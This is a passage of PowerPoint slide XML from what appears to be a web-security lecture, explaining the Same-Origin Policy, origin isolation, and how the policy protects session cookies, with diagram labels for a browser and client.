              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) can interact with a resource from another origin (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>www.bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>). Each origin is kept isolated (sandboxed) from the rest of the web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="28057" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1988"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" baseline="7000" dirty="0">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>◮  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The SOP is very important when it comes to protecting HTTP cookies (used to maintain authenticated user sessions)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:cs typeface="Lucida Sans Unicode"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9798A2DC-02B7-794E-B0B9-7EFC5384F4B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="3048000"/>
            <a:ext cx="8477250" cy="892175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SOP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>received </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="-375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4443" algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="359"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" i="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>elements</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387" name="Title 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2202FA0A-30D3-2C46-A0EE-BD362F501265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US">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7C27C7A-FB9E-E44C-B383-CE7C6ECA2CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795338" y="4800600"/>
            <a:ext cx="9372600" cy="877888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" i="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>How:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>separate content with diﬀerent trust levels (origins) into </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>            diﬀerent frames, restrict communication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>between frames.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BA02AED-E8B5-0D44-9F2C-0F9720E3220F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1156835" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="130" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-204" dirty="0"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145411" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FBB662E-7643-694B-AD7D-BDB90428BCA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1003300" y="1981200"/>
            <a:ext cx="8051800" cy="254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45412" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7E5F9A-4455-7048-9E3E-EF0E0E8C9323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1357313" y="3576638"/>
            <a:ext cx="1539875" cy="11445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45413" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3BD1E06-9169-674E-894F-B33C93C3FD65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1377950" y="3586163"/>
            <a:ext cx="1500188" cy="11049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6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8E9D19-BB29-434B-B0EA-1BE145567FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727200" y="4013200"/>
            <a:ext cx="814388" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>owser</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F3A5088-F2CA-0F4E-9D14-B95D638C3B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3124200"/>
            <a:ext cx="879475" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145416" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB6BF95-CB0E-444D-A8E4-976C32235EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1074738" y="3511550"/>
            <a:ext cx="2106612" cy="26384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45417" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172462F7-2B38-0144-B86F-06179B9F3349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1100138" y="3527425"/>
            <a:ext cx="2055812" cy="2589213"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2056764"/>
              <a:gd name="T1" fmla="*/ 2329670 h 2589529"/>
              <a:gd name="T2" fmla="*/ 0 w 2056764"/>
              <a:gd name="T3" fmla="*/ 252035 h 2589529"/>
              <a:gd name="T4" fmla="*/ 4026 w 2056764"/>
              <a:gd name="T5" fmla="*/ 206741 h 2589529"/>
              <a:gd name="T6" fmla="*/ 15651 w 2056764"/>
              <a:gd name="T7" fmla="*/ 164096 h 2589529"/>
              <a:gd name="T8" fmla="*/ 34139 w 2056764"/>
              <a:gd name="T9" fmla="*/ 124836 h 2589529"/>
              <a:gd name="T10" fmla="*/ 58820 w 2056764"/>
              <a:gd name="T11" fmla="*/ 89653 h 2589529"/>
              <a:gd name="T12" fmla="*/ 88957 w 2056764"/>
              <a:gd name="T13" fmla="*/ 59282 h 2589529"/>
              <a:gd name="T14" fmla="*/ 123853 w 2056764"/>
              <a:gd name="T15" fmla="*/ 34415 h 2589529"/>
              <a:gd name="T16" fmla="*/ 162812 w 2056764"/>
              <a:gd name="T17" fmla="*/ 15766 h 2589529"/>
              <a:gd name="T18" fmla="*/ 205120 w 2056764"/>
              <a:gd name="T19" fmla="*/ 4072 h 2589529"/>
              <a:gd name="T20" fmla="*/ 250070 w 2056764"/>
              <a:gd name="T21" fmla="*/ 0 h 2589529"/>
              <a:gd name="T22" fmla="*/ 1784705 w 2056764"/>
              <a:gd name="T23" fmla="*/ 0 h 2589529"/>
              <a:gd name="T24" fmla="*/ 1829657 w 2056764"/>
              <a:gd name="T25" fmla="*/ 4072 h 2589529"/>
              <a:gd name="T26" fmla="*/ 1871965 w 2056764"/>
              <a:gd name="T27" fmla="*/ 15766 h 2589529"/>
              <a:gd name="T28" fmla="*/ 1910924 w 2056764"/>
              <a:gd name="T29" fmla="*/ 34415 h 2589529"/>
              <a:gd name="T30" fmla="*/ 1945828 w 2056764"/>
              <a:gd name="T31" fmla="*/ 59282 h 2589529"/>
              <a:gd name="T32" fmla="*/ 1975968 w 2056764"/>
              <a:gd name="T33" fmla="*/ 89653 h 2589529"/>
              <a:gd name="T34" fmla="*/ 2000641 w 2056764"/>
              <a:gd name="T35" fmla="*/ 124836 h 2589529"/>
              <a:gd name="T36" fmla="*/ 2019139 w 2056764"/>
              <a:gd name="T37" fmla="*/ 164096 h 2589529"/>
              <a:gd name="T38" fmla="*/ 2030755 w 2056764"/>
              <a:gd name="T39" fmla="*/ 206741 h 2589529"/>
              <a:gd name="T40" fmla="*/ 2034785 w 2056764"/>
              <a:gd name="T41" fmla="*/ 252035 h 2589529"/>
              <a:gd name="T42" fmla="*/ 2034785 w 2056764"/>
              <a:gd name="T43" fmla="*/ 2329670 h 2589529"/>
              <a:gd name="T44" fmla="*/ 2030755 w 2056764"/>
              <a:gd name="T45" fmla="*/ 2374977 h 2589529"/>
              <a:gd name="T46" fmla="*/ 2019139 w 2056764"/>
              <a:gd name="T47" fmla="*/ 2417616 h 2589529"/>
              <a:gd name="T48" fmla="*/ 2000641 w 2056764"/>
              <a:gd name="T49" fmla="*/ 2456880 h 2589529"/>
              <a:gd name="T50" fmla="*/ 1975968 w 2056764"/>
              <a:gd name="T51" fmla="*/ 2492056 h 2589529"/>
              <a:gd name="T52" fmla="*/ 1945828 w 2056764"/>
              <a:gd name="T53" fmla="*/ 2522434 h 2589529"/>
              <a:gd name="T54" fmla="*/ 1910924 w 2056764"/>
              <a:gd name="T55" fmla="*/ 2547299 h 2589529"/>
              <a:gd name="T56" fmla="*/ 1871965 w 2056764"/>
              <a:gd name="T57" fmla="*/ 2565940 h 2589529"/>
              <a:gd name="T58" fmla="*/ 1829657 w 2056764"/>
              <a:gd name="T59" fmla="*/ 2577648 h 2589529"/>
              <a:gd name="T60" fmla="*/ 1784705 w 2056764"/>
              <a:gd name="T61" fmla="*/ 2581708 h 2589529"/>
              <a:gd name="T62" fmla="*/ 250070 w 2056764"/>
              <a:gd name="T63" fmla="*/ 2581708 h 2589529"/>
              <a:gd name="T64" fmla="*/ 205120 w 2056764"/>
              <a:gd name="T65" fmla="*/ 2577648 h 2589529"/>
              <a:gd name="T66" fmla="*/ 162812 w 2056764"/>
              <a:gd name="T67" fmla="*/ 2565940 h 2589529"/>
              <a:gd name="T68" fmla="*/ 123853 w 2056764"/>
              <a:gd name="T69" fmla="*/ 2547299 h 2589529"/>
              <a:gd name="T70" fmla="*/ 88957 w 2056764"/>
              <a:gd name="T71" fmla="*/ 2522434 h 2589529"/>
              <a:gd name="T72" fmla="*/ 58820 w 2056764"/>
              <a:gd name="T73" fmla="*/ 2492056 h 2589529"/>
              <a:gd name="T74" fmla="*/ 34139 w 2056764"/>
              <a:gd name="T75" fmla="*/ 2456880 h 2589529"/>
              <a:gd name="T76" fmla="*/ 15651 w 2056764"/>
              <a:gd name="T77" fmla="*/ 2417616 h 2589529"/>
              <a:gd name="T78" fmla="*/ 4026 w 2056764"/>
              <a:gd name="T79" fmla="*/ 2374977 h 2589529"/>
              <a:gd name="T80" fmla="*/ 0 w 2056764"/>
              <a:gd name="T81" fmla="*/ 2329670 h 25895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6764" h="2589529">
                <a:moveTo>
                  <a:pt x="0" y="2336219"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="252748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4072" y="207316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15812" y="164556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34507" y="125181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59443" y="89906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89906" y="59443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125181" y="34507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164556" y="15812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207316" y="4072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252748" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1803811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849244" y="4072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1892005" y="15812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1931381" y="34507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966658" y="59443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997121" y="89906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2022058" y="125181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2040754" y="164556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052495" y="207316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2056568" y="252748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2056568" y="2336219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052495" y="2381651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2040754" y="2424411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2022058" y="2463785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997121" y="2499061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966658" y="2529523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1931381" y="2554458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1892005" y="2573153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849244" y="2584893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1803811" y="2588965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252748" y="2588965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207316" y="2584893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164556" y="2573153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125181" y="2554458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89906" y="2529523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59443" y="2499061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34507" y="2463785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15812" y="2424411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4072" y="2381651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2336219"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="982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18" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DC7EA1A-801B-5447-897E-6A3054A42191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1555750" y="5233988"/>
            <a:ext cx="1144588" cy="8382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45419" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63534738-A160-EC41-9B37-A6713F8CF017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="5253038"/>
            <a:ext cx="1104900" cy="79851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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
